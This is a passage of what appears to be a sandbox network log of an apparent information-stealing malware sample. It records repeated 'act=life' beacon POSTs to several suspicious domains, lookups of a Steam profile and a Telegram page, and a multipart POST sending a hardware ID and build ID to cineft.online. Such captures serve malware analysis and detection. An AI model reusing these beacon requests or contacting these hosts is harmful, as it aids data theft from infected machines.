cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1723&rtt_var=656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1694718&cwnd=239&unsent_bytes=0&cid=19a7ebf070225c41&ts=726&x=0"
2024-12-14 22:58:55 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49923	104.102.49.254	443	940	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:58 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 22:58:59 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 22:58:58 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=9d81ad43cc8361677afa23ba; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 22:58:59 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 22:58:59 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 22:58:59 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 22:58:59 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50002	104.21.79.7	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:22 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drive-connect.cyou
2024-12-14 22:59:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:59:22 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3t2bvbmiaoc5cffqo12u857tfv; expires=Wed, 09-Apr-2025 16:46:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bz2LydwM0F2%2BOJwaQ30Q9tbxO%2F7HI7cGT2Hj5QnNxHJ8TJFZigTasqofLQKApcQV7Yf7cK97hBKb6t0b%2FHtX2Z7ADYBV9npVmOEMi7%2FuyZwW9b2w3lDooZngmrFaNvtQwh2TCP4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cdd018607289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1978&rtt_var=753&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1441975&cwnd=238&unsent_bytes=0&cid=85eaf41515f5c965&ts=736&x=0"
2024-12-14 22:59:22 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:59:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	50016	149.154.167.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:24 UTC	86	OUT	GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:25 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 14 Dec 2024 22:59:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12324 Connection: close Set-Cookie: stel_ssid=81394aa1409a447a41_10385395709561211233; expires=Sun, 15 Dec 2024 22:59:25 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-14 22:59:25 UTC	12324	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50018	104.21.50.161	443	6260	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:25 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-14 22:59:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:59:26 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o1k6jg30o0ok73lejt7tn98dgp; expires=Wed, 09-Apr-2025 16:46:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMl%2FaO3rAMWLPmbeOsEgp2E%2FfFGS9CgMUAeJUhjaNOKFkB02%2B0MII3ZT4sXAlKVlBUtM44BsaiXmvVw8rpMIJGbraq1OJcxzwtYsw9GFiawYLoTl2jXtpLP1MJ0DL0Wldg4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cde59aa978dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1847&min_rtt=1841&rtt_var=694&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1586094&cwnd=174&unsent_bytes=0&cid=1afbf717db3f299a&ts=722&x=0"
2024-12-14 22:59:26 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:59:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50017	104.102.49.254	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:25 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 22:59:26 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 22:59:26 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=5f90566e6d8aac2713030e39; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 22:59:26 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 22:59:26 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 22:59:26 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 22:59:26 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50026	104.21.22.222	443	6260	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:27 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 22:59:27 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:59:28 UTC	1012	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=os4g6u0pl8kaa0gr2atflkqgfr; expires=Wed, 09-Apr-2025 16:46:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K5hk9OlNrsy1TaYKf44o56dRFGTJaOLevEKPbJb8%2BX4PfNNX9QyjSO2hKjAVh4Dd9SQaT4Xbsc%2BMbyNwTbZv9OxK389q5oW4FP1CbZk%2BVeKpPZ9r9HvUSNb%2BVfu9QmsFCyw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cdf1ad72c427-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1561&rtt_var=589&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1851616&cwnd=32&unsent_bytes=0&cid=da47bfaf6fbe7cf1&ts=729&x=0"
2024-12-14 22:59:28 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:59:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	50025	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:27 UTC	233	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50033	104.21.64.1	443	6260	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:29 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 22:59:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:59:30 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o2mvnla1usdcr1fmgl37u7u01p; expires=Wed, 09-Apr-2025 16:46:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2F22QKp%2By5DHKdN1LOf9WvikVtXwG4L47xKJUc5yjVHP2iraLzTzCxnPsmjG%2BL01%2BbmZdJ%2FoLfZDKZ6nR59T2YFX4FqeA%2F4gLpWBi33CGSQDt%2BsCJAbj94VIsJ730i6qgfeF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cdfeaf7642e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1752&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1569048&cwnd=239&unsent_bytes=0&cid=b539203ebf1f3ac5&ts=740&x=0"
2024-12-14 22:59:30 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:59:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	50034	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:29 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FKFKXLNYM7GV37Q9ZCBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:29 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 5a 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 5a 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 5a 43 42 41 2d 2d 0d Data Ascii: ------FKFKXLNYM7GV37Q9ZCBAContent-Disposition: form-data; name="hwid"5DEC96B543762778904926-a33c7340-61ca------FKFKXLNYM7GV37Q9ZCBAContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------FKFKXLNYM7GV37Q9ZCBA--
